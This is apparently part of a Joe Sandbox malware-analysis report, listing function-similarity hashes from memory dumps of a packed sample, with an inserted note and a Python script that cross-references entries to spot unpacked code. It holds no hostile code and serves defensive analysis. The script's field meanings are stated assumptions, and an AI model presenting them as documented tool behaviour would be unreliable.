                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .
                                                                              • API String ID: 0-248832578
                                                                              • Opcode ID: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                                              • Instruction ID: 911296d1392f8c3c8cd6404ab6709485da162d277dd93cabcee5ac66b0687773
                                                                              • Opcode Fuzzy Hash: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                                              • Instruction Fuzzy Hash: 39A14B72E087618BC7109E28C98035BBBE1AB81310F698A7EDDD4B73D5DB389C458BC5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .
                                                                              • API String ID: 0-248832578
                                                                              • Opcode ID: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                                              • Instruction ID: 6f5361a82d9f9e9de671177fd4b493300712ad1084c4201cf361fa26c80e04e1
                                                                              • Opcode Fuzzy Hash: f79fadad359256f9c8902d74d10a2b3d9a93aa70e8ce4c65eb9bac628b7d73f4
                                                                              • Instruction Fuzzy Hash: 3BA13A72E083614FCF118E28C89439AFBE1AB81314F59CA59DDD6A73A5E3349C859BC1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Y\]R
                                                                              • API String ID: 2994545307-2023185185
                                                                              • Opcode ID: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                                                              • Instruction ID: 32cb53c941d059e59dbce30d87d00b37379897002de2ab33e1c58f8979392959
                                                                              • Opcode Fuzzy Hash: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                                                              • Instruction Fuzzy Hash: 6E910371A087118BE314CF29D89076BF7E2FBC5314F18862DE89597391DB79DC0A8786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Y\]R
                                                                              • API String ID: 0-2023185185
                                                                              • Opcode ID: 6f2147a5695bd4a53398488ea1253b7368f890971a7c40f09ff34ff683eb93e5
                                                                              • Instruction ID: 99217cf195a378f9d5264077a5d2046068a92f6f8247e44550b4d5a6ed26f5e4
                                                                              • Opcode Fuzzy Hash: 6f2147a5695bd4a53398488ea1253b7368f890971a7c40f09ff34ff683eb93e5
                                                                              • Instruction Fuzzy Hash: 9E91E0716483209BD318DF28D89076BB7E3EBC5314F188A2CF89997390DB759919CB82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <
                                                                              • API String ID: 0-4251816714
                                                                              • Opcode ID: 4cb474083ab1d720fa74cee5836e6e80a3847d91a69879083b1040dd856b60c3
                                                                              • Instruction ID: 298ed6161c937c0e6968453eb829229e96a7e3621a1d6b118fdfa9d8e411f9a2
                                                                              • Opcode Fuzzy Hash: 4cb474083ab1d720fa74cee5836e6e80a3847d91a69879083b1040dd856b60c3
                                                                              • Instruction Fuzzy Hash: 78D1B0216087C28ED726CB3C8844359BF91AB67224F0983D9D0E95F3D3C3698986C7E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: x(m.
                                                                              • API String ID: 0-3038009362
                                                                              • Opcode ID: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
                                                                              • Instruction ID: 8fe95d6803831fae5c575aca5061d2950839e556567635e7946eadf65fb6b687
                                                                              • Opcode Fuzzy Hash: 2334306b3d1fa9529e9ef949cf5e5337414280495606308dda49b0f52e9ab68a
                                                                              • Instruction Fuzzy Hash: F27128B2A083108BD3248F25C4D03A7B7E1EFDA314F19595DE8C66B391E7788945C7D6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: x(m.
                                                                              • API String ID: 0-3038009362
                                                                              • Opcode ID: 55679c1ab79aa0cc9e8bd8632c0c6d17a464fbc66da0cad8c1dcaab4c2fdadcb
                                                                              • Instruction ID: 4abc9576d0aebcbab10e830ca66bfe4ad776fc181f7203997bf824be8eafd510
                                                                              • Opcode Fuzzy Hash: 55679c1ab79aa0cc9e8bd8632c0c6d17a464fbc66da0cad8c1dcaab4c2fdadcb
                                                                              • Instruction Fuzzy Hash: 487148B2A483508BD364CF24C4D076BB7F1EFDA318F195A1CE9C66B691E7758805CB82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,
                                                                              • API String ID: 0-3772416878
                                                                              • Opcode ID: 0e374678804395dc01eb8fefaf4987f3ffbc266451ec095f969c6d68de8c5adc
                                                                              • Instruction ID: 9057347cd236a3d55169ab5d420f90e4f8a8bfd1e184600247eeff6d96e402e7
                                                                              • Opcode Fuzzy Hash: 0e374678804395dc01eb8fefaf4987f3ffbc266451ec095f969c6d68de8c5adc
                                                                              • Instruction Fuzzy Hash: 04B139712083819FD325CF18C88061BFBE0AFA9704F484E6DE5D997782D635E918CBA7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: qVol
                                                                              • API String ID: 0-1016533244
                                                                              • Opcode ID: a4f124c9ac02752dc567efe38763db5f0b81abf009628bda67d4b8c7e599d092
                                                                              • Instruction ID: 3822851cd43ddfd6e2ae3d15aa8c6b5369446e8c252419fc1ba6ad4511229b5c
                                                                              • Opcode Fuzzy Hash: a4f124c9ac02752dc567efe38763db5f0b81abf009628bda67d4b8c7e599d092
                                                                              • Instruction Fuzzy Hash: B181FE752087458BD724CF28D880B6BB3F1FB85354F19812DEA958B3A1EB35EC11C74A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: qVol
                                                                              • API String ID: 0-1016533244
                                                                              • Opcode ID: bab27bdf19bf43604da4d2719dc478bcee0a316a956e87a0dcfafb43d41436d0
                                                                              • Instruction ID: 2a81e873fbbab70bbb9da1d05b6d4b9d70a15c49e6b56ae010b5238b8edfb2ef
                                                                              • Opcode Fuzzy Hash: bab27bdf19bf43604da4d2719dc478bcee0a316a956e87a0dcfafb43d41436d0
                                                                              • Instruction Fuzzy Hash: C981D2756443158FC724DF28C890A6AB3F2FF85714F15812CF9958B3A1E732E869CB42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gfff
                                                                              • API String ID: 0-1553575800
                                                                              • Opcode ID: 3bf142fd8a215ea0c64be45187437800715a7ca7fa3f03cb850da3ccfabd6cc7
                                                                              • Instruction ID: 92e196d3d9e6bda93a0c7e2106ea41e010bf6410d3e766de811087e40ead5107
                                                                              • Opcode Fuzzy Hash: 3bf142fd8a215ea0c64be45187437800715a7ca7fa3f03cb850da3ccfabd6cc7
                                                                              • Instruction Fuzzy Hash: 6291C5B1A086429FC714CB29C4917ABFBD29BD5304F18892EE4D9C7352E739DC85CB86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gfff
                                                                              • API String ID: 0-1553575800
                                                                              • Opcode ID: 6ceb0d1c140525c60d7b3d2d9bab67d25452a9bb47d8311bc79918efc40535ca
                                                                              • Instruction ID: ddf61fca3ada7dc617fd8e55269facb4449c1442fc92c648d8efbd00d1b7a849
                                                                              • Opcode Fuzzy Hash: 6ceb0d1c140525c60d7b3d2d9bab67d25452a9bb47d8311bc79918efc40535ca
                                                                              • Instruction Fuzzy Hash: CB91C3B15483428FC759CF28C4916ABBBE2AFD4204F18CA2DE5D987751E339E845DB82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: q
                                                                              • API String ID: 0-3900047139
                                                                              • Opcode ID: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
                                                                              • Instruction ID: bfd71d5ee42355939c062a028dadac58486c6c85aba871825f936092bfaa215d
                                                                              • Opcode Fuzzy Hash: 6b5437a597b224c58c18eff0cd7f9e1b12adb8a3c204c60dfaa919d9716313ac
                                                                              • Instruction Fuzzy Hash: AC5103B4604310CBD7209F24E85176B73E1FF85318F54456DE9898B3A1E739D92ACB8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >
                                                                              • API String ID: 0-325317158
                                                                              • Opcode ID: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
                                                                              • Instruction ID: f78e35e26b24cf68e4bc09e6cd2b7899b815de8684f97abc49024c1dd2b64b0c
                                                                              • Opcode Fuzzy Hash: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
                                                                              • Instruction Fuzzy Hash: D76127B3A5D6D04BD3258A3C4C613EA6A930FA7330F2D87AAE8F5873E1D15D8C469345
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >
                                                                              • API String ID: 0-325317158
                                                                              • Opcode ID: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
                                                                              • Instruction ID: f9944c6e61b0f49e68fb82cb05b4e6ff0b116da0c9c59cc64c1fac7e55ab1ce0
                                                                              • Opcode Fuzzy Hash: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
                                                                              • Instruction Fuzzy Hash: B961562768D7D04BD3298A3C4C613AABA930BD3234F2D87B9E6F5877E1D2598805D381
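The two entries directly above share Opcode ID f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591 but carry different Instruction IDs: one sits in the PE-backed image mapping at 0x00400000, the other in the non-PE-backed region at 0x020E0000 that also shows a "Yara matches" heading. Read as a pair, that is the kind of evidence behind the report's "Detected unpacking" signatures: the same function appears in the unpacked copy with different operand bytes. The script below is an added example, not Joe Sandbox's own code. It parses entries in the bullet-list layout used in this section, groups them by Opcode ID, and lists the functions present in more than one memory region. The sample input is three entries copied from this section; the reading that Opcode ID depends only on the opcode sequence while Instruction ID also covers operands is an assumption consistent with the data, since the report does not define either field.

```python
"""Cross-reference Joe Sandbox function-similarity entries across memory dumps.

Added example, not Joe Sandbox's own code. Field semantics are an assumption:
the report does not define 'Opcode ID' or 'Instruction ID'.
"""
import re
from collections import defaultdict

# Sample input: three entries copied verbatim from the report section.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID:
• String ID: >
• API String ID: 0-325317158
• Opcode ID: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
• Instruction ID: f78e35e26b24cf68e4bc09e6cd2b7899b815de8684f97abc49024c1dd2b64b0c
Strings
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID: >
• API String ID: 0-325317158
• Opcode ID: f1bc986dabf3978d0cb1bf79de7b73276bda3729ec1d8848391f1f4d6f7e9591
• Instruction ID: f9944c6e61b0f49e68fb82cb05b4e6ff0b116da0c9c59cc64c1fac7e55ab1ce0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID:
• String ID: (
• API String ID: 0-3887548279
• Opcode ID: ee7fa4accd31e59d0910d8aa9e7224e6b0750909148df57fa657f99ce6b3dc18
• Instruction ID: 2caae83b2d4013721f210141ccc417c30349dd5d0901d4fb7f3c841e3804c493
"""

# "• Name: value" bullets; the name runs up to the first colon.
FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# Region base and PE-backing flag embedded in the Source File value.
REGION = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")


def parse_entries(text):
    """Return one dict per 'Memory Dump Source' block, with region metadata."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {"has_yara_heading": False}
            entries.append(cur)
            continue
        if cur is None:
            continue
        if line == "Yara matches":
            cur["has_yara_heading"] = True
            continue
        m = FIELD.match(line)
        if m:
            cur[m.group(1).strip()] = m.group(2).strip()
    for e in entries:
        r = REGION.search(e.get("Source File", ""))
        e["region"] = int(r.group(1), 16) if r else None
        e["pe_backed"] = (r.group(2) == "true") if r else None
    return entries


def cross_reference(entries):
    """Group entries by Opcode ID: which regions hold it, which Instruction IDs it has."""
    groups = defaultdict(lambda: {"regions": set(), "instruction_ids": set()})
    for e in entries:
        oid = e.get("Opcode ID")
        if not oid:
            continue
        groups[oid]["regions"].add(e["region"])
        groups[oid]["instruction_ids"].add(e.get("Instruction ID"))
    return dict(groups)


def shared_functions(entries):
    """Opcode IDs seen in more than one memory region (image copy vs. unpacked copy)."""
    return {o: g for o, g in cross_reference(entries).items() if len(g["regions"]) > 1}


if __name__ == "__main__":
    for oid, g in shared_functions(parse_entries(SAMPLE)).items():
        regions = ", ".join(f"0x{r:08X}" for r in sorted(g["regions"]))
        operands = "differ" if len(g["instruction_ids"]) > 1 else "identical"
        print(f"{oid[:16]}...  regions: {regions}  instruction bytes: {operands}")
```

Run against a full report export, the same grouping turns hundreds of near-duplicate entries into a short list of functions that exist in both the original image and the unpacked region, which is the set worth opening in a disassembler first.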
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (
                                                                              • API String ID: 0-3887548279
                                                                              • Opcode ID: ee7fa4accd31e59d0910d8aa9e7224e6b0750909148df57fa657f99ce6b3dc18
                                                                              • Instruction ID: 2caae83b2d4013721f210141ccc417c30349dd5d0901d4fb7f3c841e3804c493
                                                                              • Opcode Fuzzy Hash: ee7fa4accd31e59d0910d8aa9e7224e6b0750909148df57fa657f99ce6b3dc18
                                                                              • Instruction Fuzzy Hash: E851DE74109780DFDB209F24D859BABB7E5FF92314F09096DE4C98B2A1EB388514CB5B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: rA
                                                                              • API String ID: 0-3688822144
                                                                              • Opcode ID: 0fecef19979ae2520a6d41ae5022304e5fe91d9e10e30bf12275cb775264daa6
                                                                              • Instruction ID: eea7f0b4564a115e112266a705f564882217ee49f10fc6db0b082ff3a9467cbb
                                                                              • Opcode Fuzzy Hash: 0fecef19979ae2520a6d41ae5022304e5fe91d9e10e30bf12275cb775264daa6
                                                                              • Instruction Fuzzy Hash: 21410B3565C7824BD336CE7984903ABBBD2ABC6310F0C8A7D94D197785DE7CC8468752
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: q
                                                                              • API String ID: 0-3900047139
                                                                              • Opcode ID: 673c11ed654b93604eb6ab5b56a9e698777ccd58af881acd39c106462716c5a1
                                                                              • Instruction ID: d67e7dada27ce1166ccf0eb5e44d23a0e3f85ac5b5545703d2a6ba7d27a42617
                                                                              • Opcode Fuzzy Hash: 673c11ed654b93604eb6ab5b56a9e698777ccd58af881acd39c106462716c5a1
                                                                              • Instruction Fuzzy Hash: F041DAB45483018BC720DF24C491B6BB7F1FF82358F048A4CE5958B3A4E7B98606CB87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 301V
                                                                              • API String ID: 0-2749669040
                                                                              • Opcode ID: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
                                                                              • Instruction ID: b883c6af82268f00ed795242ae70fac8ef5344bf3296e8476700297429a14e3d
                                                                              • Opcode Fuzzy Hash: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
                                                                              • Instruction Fuzzy Hash: 8541BF752483118FD728DF54C8A4B6BB7F5FFC5308F08892CE4864B255E3B59648DB46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: UUK
                                                                              • API String ID: 0-1743445028
                                                                              • Opcode ID: 64f8c97061e85143dd2bf9607cc879b83cd40bcdd4eb5dc80a7e8408e6d4f248
                                                                              • Instruction ID: e9b7a210428eddec2d32ba3198370ee38b37a834245a60ff4a0e95a4beb386be
                                                                              • Opcode Fuzzy Hash: 64f8c97061e85143dd2bf9607cc879b83cd40bcdd4eb5dc80a7e8408e6d4f248
                                                                              • Instruction Fuzzy Hash: D14106322087504BD31CCF38D9A132BFBD7AB85314F5A856ED0868B791D6B999058B89
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "c_
                                                                              • API String ID: 0-1905016733
                                                                              • Opcode ID: 54f33eb4d3c200ec803ec730c350af6742ffe7018a8b1e5f7191d90e9f16e4db
                                                                              • Instruction ID: 139d9a56c6b22736b00f81c9c0a59650492495ee9bcb90bc8dd56261b9d87cf4
                                                                              • Opcode Fuzzy Hash: 54f33eb4d3c200ec803ec730c350af6742ffe7018a8b1e5f7191d90e9f16e4db
                                                                              • Instruction Fuzzy Hash: 7331F172E055018FC319CF2CC8623A6FBA2FB59308F19D12CC555A7796C7B9A80A8B84
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %
                                                                              • API String ID: 0-2567322570
                                                                              • Opcode ID: 2611800c88671bb526049112999962ec915228d777db172c398fa2dfb9493879
                                                                              • Instruction ID: fc55fbf2e67d6e55d69b8bdcc21a86b947583cb7b9fc2e15381c79fb32be4bbc
                                                                              • Opcode Fuzzy Hash: 2611800c88671bb526049112999962ec915228d777db172c398fa2dfb9493879
                                                                              • Instruction Fuzzy Hash: 492125315583508FD3248F24C854B6ABBE0EF9A318F084A5EE4D5EB392C379C945CB8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %
                                                                              • API String ID: 0-2567322570
                                                                              • Opcode ID: 4d24bd78338286888f8d211ca0a5dc873c79f3b924ede333e2a7dd3152c8cbc9
                                                                              • Instruction ID: 9afa1e46bb7400312ae07a624e6cea43cd59506ab6710e059aef99d57f390103
                                                                              • Opcode Fuzzy Hash: 4d24bd78338286888f8d211ca0a5dc873c79f3b924ede333e2a7dd3152c8cbc9
                                                                              • Instruction Fuzzy Hash: 152137316983508FD3548F24C854B2ABBE0AF8A31CF484A5DE4D5EB791C379C946CB46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: UZW
                                                                              • API String ID: 0-4101217444
                                                                              • Opcode ID: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                              • Instruction ID: beb92d7dceb5f7ee2bc2359878695b6a9a5b74cab8484de6a3c22e177f9b20e4
                                                                              • Opcode Fuzzy Hash: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                              • Instruction Fuzzy Hash: 2D21E7706093618BD7209F65E89577FB7E1EF92308F44082EE5C187252EB7DC806CB5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: UZW
                                                                              • API String ID: 0-4101217444
                                                                              • Opcode ID: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                              • Instruction ID: c5038677321537655114d70b44744d004d5ddc6fef92d551e92d91e9f05e5ec5
                                                                              • Opcode Fuzzy Hash: 214fb597cb98695a4d45f46ce28af4813d836258ed31ce56576b7396067f434c
                                                                              • Instruction Fuzzy Hash: 08219FB040C3448BDB20AF64889176BB7E5EF92314F09083EE592872D1E7B9C401CB16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #C}
                                                                              • API String ID: 0-275300757
                                                                              • Opcode ID: 54d830f3108b5f410fe416606f389226582127205c1caaec64cd793ee302cd76
                                                                              • Instruction ID: 85896d1aede11f76443ea156dd0dfddbb65bcd48101da94535102ff9d7a967db
                                                                              • Opcode Fuzzy Hash: 54d830f3108b5f410fe416606f389226582127205c1caaec64cd793ee302cd76
                                                                              • Instruction Fuzzy Hash: B811CE764883058BD318DF19C4816ABFBE5BBE1304F15192DF19687258CB71D3498B8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
